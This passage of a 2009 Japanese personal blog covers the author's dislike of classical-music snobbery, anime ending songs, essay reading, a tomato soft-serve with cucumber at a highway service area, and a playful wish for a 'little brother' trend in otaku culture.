を練習してます

どちらも難しい曲ではないんですが
ラフマニノフのナルシスト気風
divの多さに胃液が分泌過多になりそうです

あ、新世界は好きですよ
民族リズムがかっこいいし
CMでおなじみなので


でも基本的にアオノリはクラシックが嫌いです

アオノリが子供すぎるのか、どれもこれも難解なクラシックが全く理解できません

でも楽器を弾く上でクラシックから遠ざかることはできなかったので、最近までは好きなフリをしていました

周りの楽器弾きの間では多くの曲を経験し、作曲家や指揮者の知識を披露しあうことがステータスになっているように感じます

はっきり言ってそういうのは大嫌いです

品ある楽器やクラシック愛好者はファッションブランド品のようにそれらをひけらかしたりすることはしないと思います


こういった人達は他の音楽業界にもよくいるのですが
クラシックにおいてはそれに輪を掛けて質が悪いように感じます


と、ここまで悪口でしたが

アオノリは楽器を弾くこととオーケストラで演奏することは好きですよ

わかりやすい近代アメリカのようなセミクラシックとか
映画音楽なんて最高ですね


機会があったらそちらに転身したいと思ってます


では
posted by アオノリ at 04:20| 東京 ☁| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

2009年08月18日

水彩画の少年

ふるーつたると
 アオノリです

 青い花のED「センテフォリア
 いいですね

 前回の宇宙をかける少女のEDの
 「エスパシオ」も良かったです

ところで最近

柴門ふみ
秋元康
梅田みか

あたりのエッセイを読み漁っています

怪しいメンバーですが

参考にするとか
真に受けるとか
そういうわけじゃなくて

ただ単に面白いです

人付き合いの多い方ならではの分析ってすごいですね

友達の少ない人間としては是非とも教えていただきたい…(‘ω’)

二次元脳内なら知り合いやらやら婿やら息子もいるんだがなぁ



みなみけのマコト萌えええ
posted by アオノリ at 23:43| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

四十雀やぶこうじ

ねこねる
 アオノリです


 4月に投稿した非公開の白紙記事を
 8月に書いて公開すると
 時をかけるなんちゃらになれます


 あ、イタリア人男性の名前で、テオってなんかいいですよね

 じゃなくて


そういえば 高速の赤城高原SAでとまきゅうソフトが売ってました

トマト味のソフトクリームに胡瓜が刺さってるという…


元のまま食べたかった
シリーズです



売り場の近くに捨てられて干からびた胡瓜が落ちてました

味は…確かにトマトでした


興味が湧いたらググりましょう
http://www.driveplaza.com/sapa/1800/1800101/1/diary2/2009/04/#011037
posted by アオノリ at 23:41| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする

あねおとうと

いちごたると

 アオノリです


 姉
ってどんな気分ですか



おとうと
がいたら
ねーちゃんとか
呼ばれますか

お勉強とか教えますか

忘れたお弁当届けますか


おにいちゃんCDがあるなら
おねえちゃんCDもあっていいと思うんです

妹ブームに成り代わり弟ブームの波を切実に期待


おとうと禿げ萌ええええ


でも姉御という意味での姉さんも好きです
posted by アオノリ at 23:38| 東京 ☀| Comment(0) | TrackBack(0) | 日記 | このブログの読者になる | 更新情報をチェックする
past log
×

